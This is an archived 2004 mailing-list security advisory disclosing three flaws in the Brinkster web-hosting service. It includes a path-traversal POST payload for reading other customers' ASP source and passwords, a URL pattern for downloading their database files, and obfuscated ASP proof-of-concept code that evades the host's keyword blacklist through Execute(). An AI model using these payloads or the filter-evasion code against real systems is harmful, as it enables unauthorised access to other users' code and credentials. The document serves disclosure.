OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[VulnWatch] Brinskter Multiple Vulnerabilities

From: Ferruh Mavituna (ferruhmavituna.com)
Date: Sun Feb 08 2004 - 15:10:10 CST


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------
BRINSKTER MULTIPLE VULNERABILITIES
- ------------------------------------------------------
Online URL : http://ferruh.mavituna.com/?435

1. Retrieving other users ASP Source Codes
Severity: Highly Critical

2. Accessing Database Files
Severity: Medium Critical

3. Skipping Brinkster Code Controls
Severity: Low Critical

- ------------------------------------------------------
ABOUT BRINKSTER;
- ------------------------------------------------------
Brinkster is a popular free and paid Windows based web hosting
company with many customers
www.brinskter.com

- ------------------------------------------------------
VULNURABLE;
- ------------------------------------------------------
Currently (1/26/2004) Brinskter.com is vulnerable;

- ------------------------------------------------------
1.RETRIEVING OTHER USERS ASP SOURCE CODES
- ------------------------------------------------------
Any valid user can access other users source codes just by know file
names. So an attacker can access ASP Source Codes, database passwords
and other information in source codes.

This problem is related with Brinkster File Manager
(http://www.brinkster.com/FileManager.asp). File Manager Edit page
(http://www.brinkster.com/FileManagerEdit.asp) allows an attacker to
access other user's files by modifying POST requests.

        ------------------------------------------------------
        URL : http://www.brinkster.com/FileManagerEdit.asp
        POST : faction=editfile&file2edit=%5C..%5C[VICTIM
USERNAME]%5C[FILE
TO READ AS TEXT]
        ------------------------------------------------------

- ------------------------------------------------------
2. ACCESSING DATABASE FILES
- ------------------------------------------------------
If you know the name of any Brinkster user database file you can
download it. (You can find database name form source code -see:first
vuln.-).

        ------------------------------------------------------
        Database URL;

http://[BrinksterServer].brinkster.com/[Username]/db/[DatabaseFileName
]
        ------------------------------------------------------

- ------------------------------------------------------
3. SKIPPING CODE CONTROLS
- ------------------------------------------------------
Brinkster does not allow some code snippets in ASP files for server
performance. Like "Server.Scripttimeout = 8000". Brinkster File
Manager automatically scanning your uploaded source code and if it
find any restricted keyword, it will delete your uploaded file.

You can skip this by using ASP built-in Execute() function. This
function is not in Brinkster keyword blacklist. So write a simple
decoder and encoder for your code and use it by Execute() function.

        ------------------------------------------------------
        Proof of Concept;
        ------------------------------------------------------
        1) Simple Method without Execute();
        <%
         On _
         Error Resume Next
        %>

        2) Another Method with Execute();
        <%
        Dim onErrorStr
        onErrorStr = "S e r v e r.S c r i p t T i m e o u t-E r r o r-R e s
u m e-N e x t"
        Execute(Replace(Replace(onErrorStr," ",""),"-"," "))
        %>

        3) Another one with a Ascii values and Execute();
        This code allows you set "Server.Scripttimeout";
        <%
        Dim converted
        Const errStr =
"083101114118101114046083099114105112116084105109101111117116032061032
057048048048048048048048048 "
                converted = Asc2Str(errStr)
                Execute(converted)

                Response.Write converted

                Function Asc2Str(byVal text)
                        Dim converted, character, i
                        For i = 0 to Round((Len(text)-1)/3,0)
                                If Len(text) > 2 Then
                                        character = Chr(Left(text,3))
                                        converted = converted & character
                                        text = Right(text,Len(text)-3)
                                End If
                        Next

                        Asc2Str = converted
                End Function
        %>
        ------------------------------------------------------
        // --
        ------------------------------------------------------

- ------------------------------------------------------
HISTORY;
- ------------------------------------------------------
01.01.2004 - Discovered
01.18.2004 - Vendor Informed
02.08.2004 - Published

- ------------------------------------------------------
Vendor Status;
- ------------------------------------------------------
2 e-mails, any answer.

Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0.3

iQA/AwUBQCaloDL0QoVzo2STEQLb/ACggW0TpBAbt4q+g+ejzLJ68PhGK9gAnA8L
d4nBCqCN6a2YpLYyycS1klqd
=jBvy
-----END PGP SIGNATURE-----